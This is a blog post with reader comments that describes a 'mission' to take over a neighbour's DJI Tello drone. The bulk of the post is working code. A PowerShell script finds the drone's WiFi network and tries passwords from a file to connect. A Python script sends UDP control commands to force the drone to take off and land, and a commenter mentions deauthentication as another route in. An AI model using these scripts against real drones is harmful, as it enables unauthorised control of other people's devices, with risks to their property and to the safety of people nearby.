Today we'll start here (1, 2... 1,2,free,for:): ;]
Today we'll plan a mission ;> (let's say) "for a neighbour" ;) who is watching us using his/her drones (a little bit "too much" in our opinion). So? ;] Let's start from the page mentioned in the last post about Tello's drone(s).
Using the sample code we can assume a simple scenario:
- our 'suspected neighbour' is watching us;[
- we don't want it in our 'castle'. ;]
Environment (;]) looks pretty simple:
- we can 'see' (ex. via: wifi sniff/listening) that the drone (in default read as: 'tello' bssid) is 'near' us
- we can 'guess' the password (in default mode Tello drone is started without any password)
Scenario:
- (we'll not talk about wifi-hacking here, sorry ;]) we can connect to the drone's wifi ("tello" for our purposes)
- we can get an IP address in 'that network' (AP).
Easy like that. So now we should be somewhere here - first stage: connecting to the drone:
I was wondering (2 weeks ;]) how can I use python to connect/read/get/anything related to:
- reading (wifi) interfaces
- if bssid found -> do a connection (using xyz:credentials)...
After a while (read as: checking, installing and excluding a lot of different packages for Windows/Linux...;)) I figure out that (I'm using Windows +VMWare), so;> I can use powershell! ;D
Yep... Anyway. ;]
Starting from the connection (using PS1 found here - thanks!) we should be here:
Modified code I used during my tests is presented below:
---<code>---
# run netsh with params
$checking_ifaces = netsh.exe wlan sh net mode=bssid | findstr /i "tello"
$ssidname = $netsh | select-string -pattern 'SSID Name'
$bssid = $netsh | select-string -pattern 'BSSID'
$ssid = $ssidname.split()[3]
# if there is a 'tello*' wifi network, we can proceed
write-output $ssid # $ssidname.split()[3]
##
# read passwords from file:
$passwdFile = ".\sample_passwords.txt"
write-output $passwdFile
foreach($line in Get-Content $passwdFile) {
if($line -match $regex){
write-output "Checking password:" $line
$line = $line.split('\n')
###
# Fill in mandatory details for the WiFi network
$WirelessNetworkSSID = $ssid # 'TELLO'
$WirelessNetworkPassword = $line # '12345678'
$Authentication = 'WPA2PSK' # Could be WPA2
$Encryption = 'AES'
# Create the WiFi profile, set the profile to auto connect
$WirelessProfile = @'
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
<name>{0}</name>
<SSIDConfig>
<SSID>
<name>{0}</name>
</SSID>
</SSIDConfig>
<connectionType>ESS</connectionType>
<connectionMode>auto</connectionMode>
<MSM>
<security>
<authEncryption>
<authentication>{2}</authentication>
<encryption>{3}</encryption>
<useOneX>false</useOneX>
</authEncryption>
<sharedKey>
<keyType>passPhrase</keyType>
<protected>false</protected>
<keyMaterial>{1}</keyMaterial>
</sharedKey>
</security>
</MSM>
</WLANProfile>
'@ -f $WirelessNetworkSSID, $WirelessNetworkPassword, $Authentication, $Encryption
# Create the XML file locally
$random = Get-Random -Minimum 1111 -Maximum 99999999
$tempProfileXML = "$env:TEMP\tempProfile$random.xml"
$WirelessProfile | Out-File $tempProfileXML
# Add the WiFi profile and connect
Start-Process netsh ('wlan add profile filename={0}' -f $tempProfileXML)
# Connect to the WiFi network - only if you need to
Start-Process netsh ('wlan connect name="{0}"' -f $WirelessNetworkSSID)
####
$updatedssid = netsh.exe wlan sh net mode=bssid | findstr /i "tello"
if($updatedssid) {
write-output "YEEEEEEEEAH! WE ARE CONNECTED TO THE DRONE TELLO! ;]"
write-output "YEEEEEEEEAH! WE ARE CONNECTED TO THE DRONE TELLO! ;]"
write-output "YEEEEEEEEAH! WE ARE CONNECTED TO THE DRONE TELLO! ;]"
} else { {
}
}}}
---</code>---
(Assuming we are connected) we can now use another 'sample code' (I found here - thanks!).
Modified version is presented on the screen below (again I was looking for a while for 'some python package' that I can use... and that's how I found... the way to "use it" - using only clear python's sockets (what I was looking for from the beginning tbh)):
Copy/paste version:
---<code>---
c@kali:~/src/telloh$ cat get_down.py
#!/usr/bin/env python
import socket
import time
import sys
target = sys.argv[1]
tello = (target, 8889)
def init_drone():
print '[?] Connecting to the target drone: %s' % ( target )
# create upd client on PC
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print '[+] Connected to the target drone: %s' % ( target )
except socket.error as err:
print(err)
exit()
try:
# send control commands to the drone
print '[i] Trying to takeover the control... :>'
s.sendto('command', tello)
time.sleep(2)
except socket.error as err:
print(err)
return s
def takeoff(s):
s.sendto('takeoff', tello)
time.sleep(5)
def land(s):
print '[i] Sending LAND mission to the drone ;)'
s.sendto('land', tello)
time.sleep(3)
def main():
s = init_drone()
takeoff(s)
print '[!] Landing in progress...'
land(s)
if __name__ == '__main__':
main()
c@kali:~/src/telloh$
---</code>---
Now. Idea is simple: as you can see connection is in (let's call it) async-mode.
Why it is important: because in normal (using drone) scenario: mobile app will connect (async) to the drone. "We" (using presented basic/example code) can not do it. So - try to restart your script if you won't get any luck with taking-over-the-drone ;)
Checking(
- we are connected; default IP range is 192.168.10.x;
- we can obtain an IP (my Windows -> VMWare -> Kali -> our_script.py;
):
Looks like it's d(r)one. ;]
Special thanks goes to my Patreon: Daniel.
You are AWESOME! ;)
So...
"What's next dude?" ;)
 |
| Source |
See you next time!
Cheers
Did you manage to simply connect to the drone's AP and send commands to it? I had to deauth first. What is your firmware version?
OdpowiedzUsuńHi @Slony:
OdpowiedzUsuń1) my way to takeover was: dron is online -> I can connect to the drone's AP/wifi -> udp_client.py is sending commands to the drone;
2) in that case - deauth is not needed (but it's one of the scenarios, true)
3) firmware of what? ping me privately (twitter/mail) if you want.
4) thanks for watching :)
cheers